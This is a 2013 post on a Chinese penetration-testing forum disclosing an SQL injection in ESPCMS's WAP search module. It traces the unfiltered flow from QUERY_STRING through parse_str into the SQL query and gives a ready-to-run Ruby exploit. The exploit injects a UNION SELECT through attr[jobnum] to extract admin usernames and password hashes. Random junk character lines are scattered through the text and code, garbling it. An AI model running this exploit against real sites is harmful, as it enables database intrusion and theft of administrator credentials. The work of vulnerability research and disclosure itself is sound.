中国网络渗透测试联盟
标题:
espcms wap模块搜索处SQL注入
[打印本页]
作者:
admin
时间:
2013-7-27 18:31
标题:
espcms wap模块搜索处SQL注入
0×0 漏洞概述0×1 漏洞细节
; q u+ ^9 Q5 X
0×2 PoC
7 ]$ T0 ?! E) x. ?( P/ |
8 Q9 W/ X) U X/ P0 y6 ]/ S5 x
; T9 H* z" o/ [5 H' d0 X
- O6 O9 A7 b) g! J5 o
0×0 漏洞概述
+ d; N" [4 e+ F5 [
) C: ~! z" v/ H9 Q! [6 I
易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。
6 }, u; _4 C3 `3 W# V6 [6 w0 S
其在处理传入的参数时考虑不严谨导致
SQL注入
发生
3 d$ j4 F+ A- Y0 Q$ \
3 y$ }' j0 W" N
( E; l( ?1 h! H' o5 I5 R
0×1 漏洞细节
+ S+ d' Y# d7 D# l. ]5 m9 O, `
# D4 K" a! g0 L0 v4 s9 p+ V
变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。
8 z: R, _) o# u/ z
正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。
8 T" q" m! O @& I( u: N
而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的
SQL注入
。
6 ?4 P: j4 Z$ d$ c( m0 D
* y. }5 }8 B' r5 M/ j, V
在/interface/3gwap_search.php文件的in_result函数中:
9 R3 f4 \3 A. z2 f$ ]& l
9 Q. R+ Z8 T1 l* J& W9 j. B
$ L- [: {3 u: p! O: V& [' j# e
( h7 [) X% y. a8 o+ s
function in_result() {
+ C& S6 F! o a0 u4 C
... ... ... ... ... ... ... ... ...
$ m1 B6 s2 K5 _8 R z" ?, t9 l
$urlcode = $_SERVER[ 'QUERY_STRING '];
1 I2 r1 X2 w/ G0 q: t4 B
parse_str(html_entity_decode($urlcode), $output);
; ?/ z+ m: U+ o& E& i- u
# ~0 x4 v5 v' m: J* }# V7 C
... ... ... ... ... ... ... ... ...
$ s( \8 t H$ u, }, p" q
if (is_array($output['attr' ]) && count($output['attr']) > 0) {
. W7 Q" P1 b) D
+ y# V( \, K Y! _, ]$ K- Z
$db_table = db_prefix . 'model_att';
; S3 x( o& z7 N3 v2 X7 G& D9 H
, n; [% s' P0 L) C
foreach ($output['attr' ] as $key => $value) {
* P/ Y- J: l- G1 N$ q( H
if ($value) {
/ E. ~$ H( m, U/ V# v
4 x$ N- g* p3 g# T4 y/ L) v
$key = addslashes($key);
* S: N; O( I# N! h
$key = $this-> fun->inputcodetrim($key);
, b) Y( c5 g9 m# Q) B' O2 o( M' `
$db_att_where = " WHERE isclass=1 AND attrname='$key'";
. D& K) w% Z$ k* A2 _& S
$countnum = $this->db_numrows($db_table, $db_att_where);
9 s# H4 s8 W" j' e) W( `) u
if ($countnum > 0) {
3 P9 q6 A3 b2 @& L, Z! y
$db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;
, \! ?2 X, g( L
}
# S/ F* X& A+ R* H
}
: u; V5 G; \# {* {- C
}
8 V; Y4 Z' W1 @' }1 z) R/ H+ Q- x- ?
}
# Z: M' |/ l7 ^) T( a9 a
if (!empty ($keyword) && empty($keyname)) {
3 y) [" ]; L9 X' f* E
$keyname = 'title';
( E# Q( Y. \5 z+ U1 c
$db_where.= " AND a.title like '%$keyword%'" ;
# e8 B& Q/ @# Q( W. @
} elseif (!empty ($keyword) && !empty($keyname)) {
- N/ M9 w0 R! X7 q
$db_where.= " AND $keyname like '% $keyword%'";
. R4 I0 A! Y# N6 Z
}
# c: Z- b6 R, n* K
$pagemax = 15;
3 B l: ?8 K1 R& p2 v4 w
# {: [( C4 P4 W. A, c4 J
$pagesylte = 1;
; w+ U8 g4 H) X1 a# y; _ {
$ O% X# F8 F% `# i+ M' i3 @& J3 O! M
if ($countnum > 0) {
/ M# [; B1 r7 e1 Y. d
! p7 u) G* \( a' |- c3 Z! P! s
$numpage = ceil($countnum / $pagemax);
0 Q/ w4 {9 J/ U3 A1 H0 H5 X
} else {
9 x* T* o8 F: U, w
$numpage = 1;
. M. i" M) \1 y# [7 i2 T0 k
}
+ z; t$ |3 A3 z7 O
$sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
( V$ X7 d0 x. ?
$this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);
- [; }/ L9 O5 ~( i
$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);
; l- j5 _6 M# x! F" M
... ... ... ... ... ... ... ... ...
/ A" I4 [& |; ]
}
. _7 E1 ~- V6 j1 x
, `6 ^- e7 u1 ~5 I( F7 y4 U/ H. E
8 g) t9 b* e- r8 y
0×2 PoC
/ ~, K7 V/ ^6 ^1 r7 B
. I. M$ x. K7 y% T: D) r; X7 a! J, L
/ F5 D5 G! ]* L. m9 z a3 ]" N1 G
9 V: H4 O7 p9 k2 A
require "net/http"
/ Y/ ~$ a$ \+ a0 z
9 v' z, I" [3 f4 k; P( G
def request(method, url)
8 \( t. f# ?% J1 U! b" l
if method.eql?("get")
/ c7 E; I. U6 g0 Y+ @
uri = URI.parse(url)
) |3 ~' V# S4 e7 L! F; h- w
http = Net::HTTP.new(uri.host, uri.port)
3 X+ _ N! }1 C* ^$ r+ S5 [2 g
response = http.request(Net::HTTP::Get.new(uri.request_uri))
( K Z, @$ z9 a5 c
return response
% C. t, X% R z
end
% p' w* d& J0 y: A8 N4 H/ A
end
2 i% R7 J6 R' s' p0 j6 ^
0 U; v1 h% _6 A$ C' _
doc =<<HERE
' f. Z6 z, V$ Y8 B3 k
-------------------------------------------------------
$ d0 b6 g: o4 V3 h4 y1 a
Espcms Injection Exploit
5 r! x9 A: n3 p2 B% x( K/ B; a
Author:ztz
" O! I; o( I0 T7 U- a' W* M- Z
Blog:
http://ztz.fuzzexp.org/
7 y4 N6 u9 H. g* }$ D! M: F' O
-------------------------------------------------------
. d/ j: Q% i" n
/ j: y# c0 O) C3 ]# z! M0 A; q
HERE
" v' E3 T3 S, ]( Z1 z/ K! P) h1 m6 F
# q* e; s5 m6 A' d
usage =<<HERE
4 K7 m' i6 P0 p2 i9 u
Usage: ruby #{$0} host port path
4 o$ A( O' k, ?: ^8 e( \
example: ruby #{$0}
www.target.com
80 /
' I8 s+ H; u7 n" g% x- {5 G8 T- D1 C! x
HERE
/ H/ \3 e4 ?4 \
# @: b( l- o# L0 g1 h% K
puts doc
6 S8 u0 |/ P- i
if ARGV.length < 3
4 T/ l; ~. ?' N$ p5 M- g; T
puts usage
% _4 k: ~! W) X4 R
else
6 z( y0 k- V5 b4 r% j2 c6 D: F
$host = ARGV[0]
4 |0 }% ?9 t0 X5 R- K# [
$port = ARGV[1]
$ M0 @/ M" {6 o K4 D( c0 m
$path = ARGV[2]
0 D9 H: Z: ]5 F# H8 U
Y9 c1 {2 b4 ?! s# h+ B
puts "
send request..."
! |' H$ c* C! l5 @+ t
url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
! _- ~+ L! C' u2 G2 _
attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
" s; z, j6 _" W, j. W+ {. e2 `
,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27
' X: y: B: P% X; f: S) y+ z
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
( N5 _: r1 D' M/ U% f: N$ i) L
response = request("get", url)
3 n+ g7 n3 { F7 X6 V7 B- f! v
result = response.body.scan(/\w+&\w{32}/)
! ?0 Y- v/ ^$ c. X# o- M
puts result
3 e7 v' n* H7 { f
end
8 L% t' r1 u. O
9 S; H; l8 O# t1 X. `
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2